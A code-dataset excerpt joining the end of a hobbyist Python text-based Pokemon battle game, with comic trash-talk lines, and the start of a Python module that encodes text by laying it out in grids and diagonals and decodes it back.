return personal_list
def decide(final_choice: bool, personal_list: list, first_dialog: bool) -> list:
while True:
print(f'{pal}so these are the pokemon that you have chosen:')
for pokemon in personal_list:
print(pokemon.name)
print(f"{pal}{first_dialog * 'No lie, those choices of pokemon were PRETTY BAD'}" +
(not first_dialog) * ("...to be honest I think that these new pokemon are"
" worse than your original choice" +
", but i still belive in your ability now that I think about it, "
"do you wanna switch or do you wanna fight with those pokemon?\n(print switch or stay)"))
answer = input().lower().strip()
if answer == 'switch':
temp_dict = {"fire": firePokemonList, "water": waterPokemonList, "grass": grassPokemonList}
for pokemon in personal_list:
list_to_append_to = temp_dict[pokemon.type]
                list_to_append_to.append(pokemon)
# if pokemon.type == 'fire':
# firePokemonList.append(pokemon)
# if pokemon.type == 'water':
# waterPokemonList.append(pokemon)
# if pokemon.type == 'grass':
# grassPokemonList.append(pokemon)
personal_list = []
personal_list = choose_pokemon(personal_list, 0)
first_dialog = False
elif answer == 'stay':
break
else:
print(f"{pal}what?\nLook I'm going to say this again")
return personal_list
def createNew(pokemon_amount: int, return_list=None) -> list:
    # avoid sharing one mutable default list between separate calls
    if return_list is None:
        return_list = []
    while len(return_list) < pokemon_amount:
random_type = choice([0, 1, 2])
if random_type == 0 and firePokemonList:
fire_pokemon = choice(firePokemonList)
return_list.append(fire_pokemon)
firePokemonList.remove(fire_pokemon)
elif random_type == 1 and waterPokemonList:
water_pokemon = choice(waterPokemonList)
return_list.append(water_pokemon)
waterPokemonList.remove(water_pokemon)
elif random_type == 2 and grassPokemonList:
            grass_pokemon = choice(grassPokemonList)
            return_list.append(grass_pokemon)
            grassPokemonList.remove(grass_pokemon)
return return_list
def createEnemy(currentPlayer: Trainer) -> list:
enemy_list = []
for pokemon in currentPlayer.pokemon:
if is_1_weak_against_2(pokemon.type, 'fire') and firePokemonList:
fire_pokemon = choice(firePokemonList)
enemy_list.append(fire_pokemon)
firePokemonList.remove(fire_pokemon)
elif is_1_weak_against_2(pokemon.type, 'water') and waterPokemonList:
water_pokemon = choice(waterPokemonList)
enemy_list.append(water_pokemon)
waterPokemonList.remove(water_pokemon)
elif is_1_weak_against_2(pokemon.type, 'grass') and grassPokemonList:
grass_pokemon = choice(grassPokemonList)
enemy_list.append(grass_pokemon)
grassPokemonList.remove(grass_pokemon)
else:
enemy_list = createNew(1, enemy_list)
return enemy_list
def enemyDesicionTree(enemy: Trainer, player: Trainer):
switch_times = 0
enemy.turn = ((enemy.turn >= 3) * 3) + ((enemy.turn < 3) * enemy.turn)
enemys_current_pokemon_is_knocked_out = enemy.pokemon[enemy.active_pokemon].is_knocked_out
enemy_can_switch_has_a_weak_pokemon_hasnt_already_switched_pokemon_and_has_pokemon_to_spare = \
enemy.turn >= 3 and is_1_weak_against_2(enemy.pokemon[enemy.active_pokemon].type, player.pokemon[
player.active_pokemon].type) and switch_times == 0 and not len(enemy.alive_pokemon) == 1
current_pokemon_is_half_health_and_trainer_has_potions = enemy.pokemon[enemy.active_pokemon].health <= (
enemy.pokemon[enemy.active_pokemon].max_health) / 2 and enemy.potions >= 1
if enemys_current_pokemon_is_knocked_out:
enemy.switch_to_not_knocked_out(player, True, False)
switch_times += 1
if enemy_can_switch_has_a_weak_pokemon_hasnt_already_switched_pokemon_and_has_pokemon_to_spare:
enemy.switch_to_not_knocked_out(player, False, True)
elif current_pokemon_is_half_health_and_trainer_has_potions:
enemy.heal(1)
else:
enemy.attack_trainer(player)
def playerDecision(player, enemy, action_done):
if not player.am_i_alive(enemy):
        player.switch_to_not_knocked_out(enemy, True, False)
else:
while True:
if player.pokemon[player.active_pokemon].is_knocked_out:
while True:
try:
print(
'Your pokemon has been knocked out and you have to replace it,'
' who is now going to be your active pokemon?\n')
player.print_alive_pokemon()
switch_to = input().strip().lower()
                        player.switch_active(switch_to, Forced=True)
                        if not player.pokemon[player.active_pokemon].is_knocked_out:
                            break
except TypeError:
print("That wasn't one of the options")
action = input(
"What do you wanna do now?\nOptions:\n-Attack\n-Heal\n-Switch\n-Print Stats"
"\n-Regret Life Decisions\n").lower().strip()
if action == 'attack':
player.attack_trainer(enemy)
break
elif action == 'heal':
if player.potions >= 1:
while True:
try:
potions_used = int(input("How many potions would you like to use?\n"))
if potions_used > player.potions:
print(f"You can't use that many potions because you only have "
f"{player.potions} potions(s)")
else:
player.heal(int(potions_used))
break
except TypeError:
print("that is an invalid number of potions\nTry again")
except ValueError:
print("that is an invalid number of potions\nTry again")
break
else:
print("You can't heal your pokemon because you have no potions left")
elif action == "switch":
# if player.turn < 2:
# print("You can only switch pokemon once every 3 turns, you'll
# have to try again later \nyou have "+3-self.turn+" turn(s) left until you can switch")
# else:
while True:
try:
print('Which pokemon do you want to switch to? Options:')
player.print_alive_pokemon()
print("-cancel")
switch_to = input().strip().lower()
if switch_to == "cancel":
break
else:
player.switch_active(switch_to, Forced=False)
break
except TypeError:
print("That wasn't one of the options try again")
break
elif action == "print stats":
stats_choice = input(
"whose stats do you want to print?\n-my stats\n-my pokemon's stats"
"\n-enemy's stats\n-enemy's pokemon stats-\nall my stats"
"\n-all my enemy's stats\n-all stats\n").lower().strip()
if stats_choice == 'my stats':
player.print_stats()
elif stats_choice == "my pokemon's stats":
player.print_pokemon_stats()
elif stats_choice == "enemy's stats":
enemy.print_stats()
elif stats_choice == "enemy's pokemon stats":
enemy.print_pokemon_stats()
elif stats_choice == "all my stats":
player.print_stats()
player.print_pokemon_stats()
elif stats_choice == "all my enemy's stats":
enemy.print_stats()
enemy.print_pokemon_stats()
elif stats_choice == "all stats":
player.print_stats()
player.print_pokemon_stats()
enemy.print_stats()
enemy.print_pokemon_stats()
else:
print('That is not a valid choice')
elif action == 'regret life decisions':
print('Regretting life decisions...')
else:
print('That is not a valid response, try again')
def real_fight(player1, enemy):
while enemy.am_i_alive(player1) and player1.am_i_alive(enemy):
print('''Your turn:\n___________________________''')
if enemy.am_i_alive(player1) and player1.am_i_alive(enemy):
playerDecision(player1, enemy, False)
input("\n")
print('''Enemy's turn:\n___________________________''')
enemyDesicionTree(enemy, player1)
def reset(player1, enemy):
print("RESET")
players = [player1, enemy]
for player in players:
player.alive = True
player.potions = 5
player.pokemon = player.OG_pokemon
player.pokemonDict = player.OG_pokemonDict
for pokemon in player.pokemon:
pokemon.health = pokemon.OG_health
pokemon.ex = False
pokemon.name = pokemon.OG_name
pokemon.is_knocked_out = False
pokemon.level = 0
pokemon.exp = 0
pokemon.ex = False
player.alive_pokemon.append(pokemon)
def advance_reset(player1, enemy):
players = [player1, enemy]
print("ADVANCE RESET")
for player in players:
player.alive = True
player.potions = 5
for pokemon in player.pokemon:
pokemon.health = pokemon.OG_health
pokemon.ex = False
pokemon.name = pokemon.OG_name
pokemon.is_knocked_out = False
pokemon.level = 0
pokemon.exp = 0
pokemon.ex = False
player.alive_pokemon.append(pokemon)
if pokemon.type == 'fire':
firePokemonList.append(pokemon)
elif pokemon.type == 'water':
waterPokemonList.append(pokemon)
elif pokemon.type == 'grass':
grassPokemonList.append(pokemon)
player.pokemonDict = None
player.pokemon = None
default_pokemon = createNew(7)
for pokemon in default_pokemon:
print(pokemon.name)
default = Trainer('Ash', 5, default_pokemon, 0)
default.print_stats()
print("__________________________")
enemy = Trainer('Blue', 5, createEnemy(default), random.randint(0, len(default.pokemon) - 1))
print('''Enemy's pokemon are ''')
enemy.print_stats()
def insult_gen():
insults = [
"I'VE SEEN ACTUAL POTATOES HAVE BETTER AIM!",
"I COULDN'T HAVE DONE WORSE IF I WAS TRYING TO SABATOGE OUR GAME!",
"I'LL Kill YOU!", "LOOKS LIKE SOMEONE WANTS TO DIE!", "REEEEEEEEEEEE!",
"\n(grabs bat)\nStranger: HEY HEY, lets focus on fighting the OTHER guy ok?",
"AARRGGGG!", "NEXT TIME MAKE SURE YOUR OPPONENT DOESN'T LIVE TO SEE THE NEXT DAY!",
"YOU'RE USELESS TO ME!", "AFTER THIS, ITS OFF TO THE GULAGS WITH YOU!",
"THATS IT! YOU ARE NOW AN ENEMY TO THE STATE!", "IF YOU'RE NOT WITH ME THEN YOU'RE AGAINST ME!",
"I FEEL LIKE YOUR PARENTS BECAUSE I'M SO DISSAPOINTED RIGHT NOW!",
"YOU'RE LIKE SWAIN, YOU'RE A FAILURE!", "TIME TO DIE!", "WHY DO YOU SUCK SO MUCH?",
"THERE IS NO WORD THAT CAN POSSIBLE DESCRIBE HOW BAD YOU ARE!"
]
return choice(insults)
def encouragement_gen(self: Trainer, other_player: Trainer) -> str:
encouragement = [
f"Nice job {self.pokemon[self.active_pokemon]}\n hey {other_player.name}! next he's going to do that to you!",
f"Way to go {self.pokemon[self.active_pokemon]}!", "god it HURTS to be this good",
"AYYYYYYYYYYY", f"Aw god {other_player.name} it must suck to suck huh?",
f"Hey {other_player.name} ! when my {self.pokemon[self.active_pokemon].name}"
f" hit your pokemon I was imagining that its face was yours!",
"HAHAHAHAHAHAHAHAHHA FEEL THE PAIN!!!", f"GOD I CANNOT IMAGINE BEING AS BAD AS YOU {other_player.name}!" +
"YES BEAT THAT M!&#*$#&@!", f"SUCK IT {other_player.name.upper()}!",
f"Hey {other_player.name} I bet you wish you were as good as me huh?\n keyword being \"wish\"",
"LETS GOOOOOO!", "Bro when you run out of pokemon I'm going to feel SOOO good beating you up",
f"Hey {other_player.name} I bet last time you got beat this bad it was with a belt right?",
f"NICE, I only need to kill a few more pokemon until I can beat the crap out of {other_player.name}",
f"Hey {other_player.name}! I bet you regret messing with me now right?\n No? Well you're about to!",
"Yknow, I once had a nightmare where I was an absolute loser so I guess I know what it felt to be like you ",
f"Yknow they say that a pokemon represents their trainer I guess that's why your "
f"{other_player.pokemon[other_player.active_pokemon].name} took that punch like a little b&#@$",
f"Yknow {other_player.name}? You should actually feel privileged to fight someone as great as me",
'GOD, I almost feel bad for you!\nKeyword "almost"',
f"Hey things are looking bad for you {other_player.name}! \nI guess I should ask now,"
f" do you wanna be punted to death or kicked to death?\nOh well I guess I'll do both",
f"*sigh* Yknow, it sucks that I'll only get to ABSOLUTELY destroy you once {other_player.name}"
f"\nActually yknow what?\nDoing it again would be REALLY easy",
"Yknow <NAME> said that two things were infinite, the amount of times that I WIN and your stupidity",
"UGH, this is actually boring now, its like beating up a toddler,"
" but I guess as long as that toddler is you, it's fine",
"When I'm done with you, homeless people will donate to you",
f"I guess the rumors are true {other_player.name}, you suck at everything"
]
return choice(encouragement)
# _________________________________________________________________________________________________________
fight_choice = input("what kinda fight?\n")
if fight_choice == 'real':
pal = 'Stranger: '
enemy_dialog = "Blue: "
print(
pal + '''Ayo that kid over there is talking smack about you \nyou gotta defend your honor! \nYou should definately fight him. \nWhat? you don't have any pokemon? \nWhat are you POOR? Fine, I'll let you borrow mine for 500 dollars per minute. \nYeah it's a great deal I know''' + '\n Anyways what pokemon do you want? You only get to choose 3 so make good decisions\nTo start off you must first')
personal_list = []
personal_list = choose_pokemon(personal_list, 0)
personal_list = decide(False, personal_list, first_dialog=True)
print(
pal + "*sigh* well I guess these pokemon aren't THAT bad anyways you should buy some potions, \npotions heal your pokemon so their suffering continues \nAnyways lets see how many potions we can buy with your money")
input('(press any key to reach into your pocket to check for money)\n')
print(
"(you find that your pocket is empty)\n" + pal + "Oh yeah I forgot, back when I was pickpocketing you for money I found 5 bucks, but don't worry I already bought you some potions\n*hands you 5 potions*")
name = input("Oh yeah it's kinda weird to ask this after everything, but what's your name?\n")
player1 = Trainer(name, 5, personal_list, 0)
input(
pal + name.upper() + "??? Thats the stupidest name I've ever heard in my life\n seriously though whats your name\n(press enter to continue)\n")
print(
pal + "oh... I see so that IS your real name... well. I should let you know that " + name + " means something unspeakable in several languages here\nAnyways what pokemon are you going to have active?\nHere a list of your pokemon in case you forgot")
print(player1.print_alive_pokemon())
while True:
active = input().lower()
try:
player1.switch_active(active, first=True)
break
except TypeError:
print(pal + 'Bruh what? you dont have that pokemon, try again')
print(
pal + "ugh, why'd you have to change to your worst pokemon\nYknow as punishment that decisions is going to be one that you can't change until your actually in battle, serves you right\n")
input(
pal + "Anyways all you need to do now is fight him, cmon you gotta face your fears and go there!\nPress enter to approach\n")
input(
enemy_dialog + "Oh? Your approaching me? Instead of running away you're coming right towards me?\n(Press enter to respond)\n")
input(
name + ": I can't beat the crap out of you without getting getting closer\n" + enemy_dialog + " Oh? Then come as close as you like\n(Both of you begin to approach each other)\n")
print("\nTime to fight" + '\nYour stats are: ')
player1.print_stats()
input("\n")
enemy = Trainer('Blue', 5, createEnemy(player1), random.randint(0, 4))
print('''Enemy's pokemon are: ''')
enemy.print_stats()
real_fight(player1, enemy)
elif fight_choice == "skip":
pokemon_amount = int(input("how many pokemon do you want?"))
default_pokemon = createNew(pokemon_amount)
default = Trainer('Ash', 5, default_pokemon, 0)
default.print_stats()
input("\n")
print("__________________________")
enemy = Trainer('Blue', 5, createEnemy(default), random.randint(0, len(default.pokemon) - 1))
print('''Enemy's pokemon are ''')
enemy.print_stats()
real_fight(default, enemy)
elif fight_choice == "test":
personal_list = []
personal_list = choose_pokemon(personal_list, 0)
personal_list = decide(False, personal_list, first_dialog=True)
default = Trainer('Ash', 5, personal_list, 0)
default.print_stats()
input("\n")
print("__________________________")
enemy = Trainer('Blue', 5, createEnemy(default), 0)
print('''Enemy's pokemon are: ''')
enemy.print_stats()
real_fight(default, enemy)
else:
default_pokemon = createNew(7)
default = Trainer('Ash', 5, default_pokemon, 0)
default.print_stats()
print("__________________________")
enemy = Trainer('Blue', 5, createEnemy(default), random.randint(0, len(default.pokemon) - 1))
print('''Enemy's pokemon are ''')
enemy.print_stats()
for x in range(1):
while enemy.am_i_alive(default) and default.am_i_alive(enemy) and enemy.alive and default.alive:
print('''Your turn:\n___________________________''')
# default.print_stats()
# playerDecision(player1,enemy,True)
# default.print_stats()
enemyDesicionTree(default, enemy)
# enemy.print_stats()
if enemy.am_i_alive(default) and default.am_i_alive(enemy) and enemy.alive and default.alive:
print('''Enemy's turn:\n___________________________''')
enemyDesicionTree(enemy, default)
# reset(default,enemy)
# #advance_reset(default,enemy)
# print(str(x))
# default.print_stats()
# default.print_pokemon_stats()
# enemy.print_stats()
# enemy.print_pokemon_stats()
``` |
{
"source": "Ji19283756/random_writing_encoder",
"score": 4
} |
#### File: Ji19283756/random_writing_encoder/insane_encoder.py
```python
from random import randint, shuffle
# OFICIAL_________________________
def flip_vertically(double_array):
return [line[::-1] for line in double_array]
def flip_horizontally(double_array):
return double_array[::-1]
def make_consistant(double_array, width, spaces):
return [line + " " * (width * (spaces + 1) - len(line)) + "\n"
for line in double_array if len(line) > 0]
def remove_spaces_and_make_double_array(message, spaces):
message = message.split("\n")
message_array = [[mini_array[x] for x in range(0, len(mini_array), spaces + 1)]
for mini_array in message if len(mini_array) != 0]
return message_array
# ______________VERTICAL____________________
def TL_top_down_vertical(message, width=10, height=12, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
            and isinstance(height, int) and isinstance(spaces, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_string_array = ["" for x in range(height)]
for x, letter in zip(range(width * height), message):
empty_string_array[x % height] += letter + " " * spaces
consistant_array = make_consistant(empty_string_array, width, spaces)
printed_string = "".join(consistant_array)
return printed_string
def TL_top_down_vertical_revert(message, spaces=2):
if not isinstance(message, str) or not isinstance(spaces, int) \
or len(message) <= 0 or spaces < 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
arranged_array = [
message_array[x][y]
for y in range(len(message_array[0]))
for x in range(len(message_array))
]
printed_string = "".join(arranged_array) # .strip()
return printed_string
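# Minimal round-trip sketch for the encode/decode pair above. The message,
# width, height and spaces values are arbitrary illustrative choices; decoding
# gives back the original text padded with trailing spaces from the grid.
_demo_encoded = TL_top_down_vertical("attack at dawn", width=4, height=4, spaces=1)
assert TL_top_down_vertical_revert(_demo_encoded, spaces=1).rstrip() == "attack at dawn"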
def TR_top_down_vertical(message, width=10, height=12, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
            and isinstance(height, int) and isinstance(spaces, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_string_array = ["" for x in range(height)]
for x, letter in zip(range(width * height), message):
empty_string_array[x % height] += " " * spaces + letter
consistant_array = make_consistant(empty_string_array, width, spaces)
printed_string = "".join(flip_vertically(consistant_array))
return printed_string
def TR_top_down_vertical_revert(message, spaces=2):
if not isinstance(message, str) or not isinstance(spaces, int) \
or len(message) <= 0 or spaces < 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
arranged_array = [
message_array[y][x]
for x in range(len(message_array[0]) - 1, -1, -1)
for y in range(len(message_array))
]
printed_string = "".join(arranged_array) # .strip()
return printed_string
def BL_top_up_vertical(message, width=10, height=12, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
            and isinstance(height, int) and isinstance(spaces, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_string_array = TL_top_down_vertical(message, width=width, spaces=spaces, height=height)
empty_string_array = empty_string_array.split("\n")[::-1]
printed_string = "".join(line + "\n" for line in empty_string_array)
return printed_string
def BL_top_up_vertical_revert(message, spaces=2):
if not isinstance(message, str) or not isinstance(spaces, int) \
or len(message) <= 0 or spaces < 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
arranged_array = [
message_array[x][y]
for y in range(len(message_array[0]))
for x in range(len(message_array))
]
printed_string = "".join(arranged_array) # .strip()
return printed_string
def BR_top_up_vertical(message, width=10, height=12, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
            and isinstance(height, int) and isinstance(spaces, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_string_array = TR_top_down_vertical(message, width=width, spaces=spaces, height=height)
empty_string_array = empty_string_array.split("\n")[::-1]
printed_string = "".join(line + "\n" for line in empty_string_array[:-1])
return printed_string
def BR_top_up_vertical_revert(message, spaces=2):
if not isinstance(message, str) or not isinstance(spaces, int) \
or len(message) <= 0 or spaces < 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces=spaces)
message_array = flip_horizontally(message_array)
arranged_array = [
message_array[y][x]
for x in range(len(message_array[0]) - 1, -1, -1)
for y in range(len(message_array))
]
printed_string = "".join(arranged_array) # .strip()
return printed_string
# ______________LEFT_RIGHT____________________
def TL_left_right_horizontal_v2(message, width=10, height=12, spaces=2):
arranged_array = [message[start:start + width]
for start, x in zip(range(0, len(message), width), range(height))]
added_spaces = ["".join(letter + " " * spaces for letter in mini_array)
for mini_array in arranged_array]
consistant_array = make_consistant(added_spaces, width, spaces)
printed_string = "".join(consistant_array)
return printed_string
def TL_left_right_horizontal_revert(message, spaces=2):
message_array = remove_spaces_and_make_double_array(message, spaces)
# try:
printed_string = "".join("".join(line) for line in message_array) # .strip()
# except:
# print(f"message: {message_array}")
return printed_string
def BL_left_right_horizontal(message, width=10, height=12, spaces=2):
arranged_array = [message[start:start + width]
for start, x in zip(range(0, len(message), width), range(height))]
added_spaces = ["".join(letter + " " * spaces for letter in mini_array)
for mini_array in arranged_array]
added_spaces = flip_horizontally(added_spaces)
consistant_array = make_consistant(added_spaces, width, spaces)
printed_string = "".join(consistant_array)
return printed_string
def BL_left_right_horizontal_revert(message, spaces=2):
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
printed_string = "".join("".join(line) for line in message_array) # .strip()
return printed_string
def TR_right_left_horizontal(message, width=10, height=12, spaces=2):
arranged_array = [message[start:start + width]
for start, x in zip(range(0, len(message), width), range(height))]
added_spaces = ["".join(" " * spaces + letter for letter in mini_array)
for mini_array in arranged_array]
consistant_array = make_consistant(added_spaces, width, spaces)
consistant_array = flip_vertically(consistant_array)
printed_string = "".join(consistant_array)
return printed_string
def TR_right_left_horizontal_revert(message, spaces=2):
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
printed_string = "".join("".join(line) for line in message_array) # .strip()
return printed_string
def BR_right_left_horizontal(message, width=10, height=12, spaces=2):
arranged_array = [message[start:start + width]
for start, x in zip(range(0, len(message), width), range(height))]
added_spaces = ["".join(" " * spaces + letter for letter in mini_array)
for mini_array in arranged_array]
consistant_array = make_consistant(added_spaces, width, spaces)
fliped_array = flip_vertically(consistant_array)
printed_string = "".join(fliped_array)
return printed_string
def BR_right_left_horizontal_revert(message, spaces=2):
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
printed_string = "".join("".join(line) for line in message_array) # .strip()
return printed_string
# ______________NORTH_EAST____________________
def TL_north_east_diagonal(message, width=12, height=19, spaces=2):
empty_string = ["" for x in range(height + 1)]
message_increment = 0
repeat = height + width
not_bigger_than_height = 0
for x in range(repeat):
if (x - width) > 0:
bottom = x - width
else:
bottom = 0
for y in range(x - not_bigger_than_height, bottom, -1):
# print(f"inc {message_increment}")
coord = y % (height + 1)
if message_increment > len(message) or message_increment > len(message) - 1:
break
elif coord > bottom:
empty_string[coord] += message[message_increment] + spaces * " "
message_increment += 1
not_bigger_than_height += x > height
# for thing in empty_string:
# print(thing)
consistant_array = make_consistant(empty_string, width, spaces)
printed_string = "".join(consistant_array)
return printed_string
def TL_north_east_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
final_message = []
message_array = remove_spaces_and_make_double_array(message, spaces)
# for line in message_array:
# print(line)
for x in range(len(message), 0, -1):
thing = x
while True:
try:
final_message += [message_array[thing][-1]]
message_array[thing].pop(-1)
thing += 1
except IndexError:
break
# for line in message_array:
# print(line)
mini_array, increment = 0, 0
while len(message_array[0]) > 0:
if len(message_array[mini_array]) > 0:
final_message += [message_array[mini_array][-1]]
message_array[mini_array].pop(-1)
mini_array += 1
mini_array %= (len(message_array))
else:
mini_array = 0
final_message = "".join(final_message[::-1]) # .strip()
return final_message
def TR_north_west_diagonal(message, width=12, height=19, spaces=2):
empty_string = ["" for x in range(height + 1)]
message_increment = 0
repeat = height + width
not_bigger_than_height = 0
for x in range(repeat):
if (x - width) > 0:
bottom = x - width
else:
bottom = 0
for y in range(x - not_bigger_than_height, bottom, -1):
# print(f"inc {message_increment}")
coord = y % (height + 1)
if message_increment > len(message) or message_increment > len(message) - 1:
break
elif coord > bottom:
empty_string[coord] += spaces * " " + message[message_increment]
message_increment += 1
not_bigger_than_height += x > height
# for thing in empty_string:
# print(thing)
consistant_array = make_consistant(empty_string, width, spaces)
consistant_array = flip_vertically(consistant_array)
printed_string = "".join(consistant_array)
return printed_string
def TR_north_west_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
final_message = []
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
# for line in message_array:
# print(line)
for x in range(len(message), 0, -1):
thing = x
while True:
try:
final_message += [message_array[thing][-1]]
message_array[thing].pop(-1)
thing += 1
except IndexError:
break
# for line in message_array:
# print(line)
mini_array, increment = 0, 0
while len(message_array[0]) > 0:
if len(message_array[mini_array]) > 0:
final_message += [message_array[mini_array][-1]]
message_array[mini_array].pop(-1)
mini_array += 1
mini_array %= (len(message_array))
else:
mini_array = 0
final_message = "".join(final_message[::-1]) # .strip()
return final_message
def BL_south_east_diagonal(message, width=12, height=19, spaces=2):
empty_string = ["" for x in range(height + 1)]
message_increment = 0
repeat = height + width
not_bigger_than_height = 0
for x in range(repeat):
if (x - width) > 0:
bottom = x - width
else:
bottom = 0
for y in range(x - not_bigger_than_height, bottom, -1):
coord = y % (height + 1)
if message_increment > len(message) or message_increment > len(message) - 1:
break
elif coord > bottom:
empty_string[coord] += message[message_increment] + spaces * " "
message_increment += 1
not_bigger_than_height += x > height
consistant_array = make_consistant(empty_string, width, spaces)
flipped_array = flip_horizontally(consistant_array)
printed_string = "".join(flipped_array)
return printed_string
def BL_south_east_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
final_message = []
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
for x in range(len(message), 0, -1):
thing = x
while True:
try:
final_message += [message_array[thing][-1]]
message_array[thing].pop(-1)
thing += 1
except IndexError:
break
mini_array, increment = 0, 0
while len(message_array[0]) > 0:
if len(message_array[mini_array]) > 0:
final_message += [message_array[mini_array][-1]]
message_array[mini_array].pop(-1)
mini_array += 1
mini_array %= (len(message_array))
else:
mini_array = 0
final_message = "".join(final_message[::-1]) # .strip()
return final_message
def BR_south_west_diagonal(message, width=12, height=19, spaces=2):
empty_string = ["" for x in range(height + 1)]
message_increment = 0
repeat = height + width
not_bigger_than_height = 0
for x in range(repeat):
if (x - width) > 0:
bottom = x - width
else:
bottom = 0
for y in range(x - not_bigger_than_height, bottom, -1):
coord = y % (height + 1)
if message_increment > len(message) or message_increment > len(message) - 1:
break
elif coord > bottom:
empty_string[coord] += spaces * " " + message[message_increment]
message_increment += 1
not_bigger_than_height += x > height
consistant_array = make_consistant(empty_string, width, spaces)
consistant_array = flip_vertically(consistant_array)
flipped_array = flip_horizontally(consistant_array)
printed_string = "".join(flipped_array)
return printed_string
def BR_south_west_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
final_message = []
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
message_array = flip_vertically(message_array)
for x in range(len(message), 0, -1):
thing = x
while True:
try:
final_message += [message_array[thing][-1]]
message_array[thing].pop(-1)
thing += 1
except IndexError:
break
mini_array, increment = 0, 0
while len(message_array[0]) > 0:
if len(message_array[mini_array]) > 0:
final_message += [message_array[mini_array][-1]]
message_array[mini_array].pop(-1)
mini_array += 1
mini_array %= (len(message_array))
else:
mini_array = 0
final_message = "".join(final_message[::-1]) # .strip()
return final_message
# ______________SOUTH_WEST____________________
def TL_south_west_diagonal(message, width=12, height=19, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
            and isinstance(height, int) and isinstance(spaces, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_array = ["" for x in range(height)]
message_increment, begin = 0, 0
if height * width > len(message):
repeat = len(message)
else:
repeat = height + width
for x in range(repeat):
if x > width:
begin += 1
for y in range(begin, x):
if y == height or message_increment > len(message) - 1:
break
else:
empty_array[y] += message[message_increment] + " " * spaces
message_increment += 1
consistant_array = make_consistant(empty_array, width, spaces)
printed_array = "".join(consistant_array)
return printed_array
def TL_south_west_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
final_message = []
height = len(message_array)
width = len(message_array[0])
for x in range(width - 1):
increment = height - 1
while True:
next_array = message_array[increment - 1]
current_array = message_array[increment]
final_message += current_array[-1]
current_array.pop(-1)
if len(next_array) == len(current_array) + 1 or increment == 0:
break
else:
increment -= 1
for x in range(len(message_array) - 1, -1, -1):
for y in range(x, x - width, -1):
try:
final_message += message_array[y][-1]
message_array[y].pop(-1)
            except IndexError:
break
printed_string = "".join(final_message[::-1]) # .strip()
return printed_string
def TR_south_east_diagonal(message, width=12, height=19, spaces=2):
def len_filler(line):
return (width * (spaces + 1) - len(line))
if not (isinstance(message, str) and isinstance(width, int) \
            and isinstance(height, int) and isinstance(spaces, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_array = ["" for x in range(height)]
message_increment, begin = 0, 0
if height * width > len(message):
repeat = len(message)
else:
repeat = height + width
for x in range(repeat):
if x > width:
begin += 1
for y in range(begin, x):
if y == height or message_increment > len(message) - 1:
break
else:
empty_array[y] += " " * spaces + message[message_increment]
message_increment += 1
consistant_array = make_consistant(empty_array, width, spaces)
consistant_array = flip_vertically(consistant_array)
printed_array = "".join(consistant_array)
return printed_array
def TR_south_east_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
final_message = []
height = len(message_array)
width = len(message_array[0])
for x in range(width - 1):
increment = height - 1
while True:
next_array = message_array[increment - 1]
current_array = message_array[increment]
final_message += current_array[-1]
current_array.pop(-1)
if len(next_array) == len(current_array) + 1 or increment == 0:
break
else:
increment -= 1
for x in range(len(message_array) - 1, -1, -1):
for y in range(x, x - width, -1):
try:
final_message += message_array[y][-1]
message_array[y].pop(-1)
            except IndexError:
break
printed_string = "".join(final_message[::-1]) # .strip()
return printed_string
def BL_south_west_diagonal(message, width=12, height=19, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
            and isinstance(height, int) and isinstance(spaces, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_array = ["" for x in range(height)]
message_increment, begin = 0, 0
if height * width > len(message):
repeat = len(message)
else:
repeat = height + width
for x in range(repeat):
if x > width:
begin += 1
for y in range(begin, x):
if y == height or message_increment > len(message) - 1:
break
else:
empty_array[y] += message[message_increment] + " " * spaces
message_increment += 1
consistant_array = make_consistant(empty_array, width, spaces)
flipped_array = flip_horizontally(consistant_array)
printed_array = "".join(flipped_array)
return printed_array
def BL_south_west_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
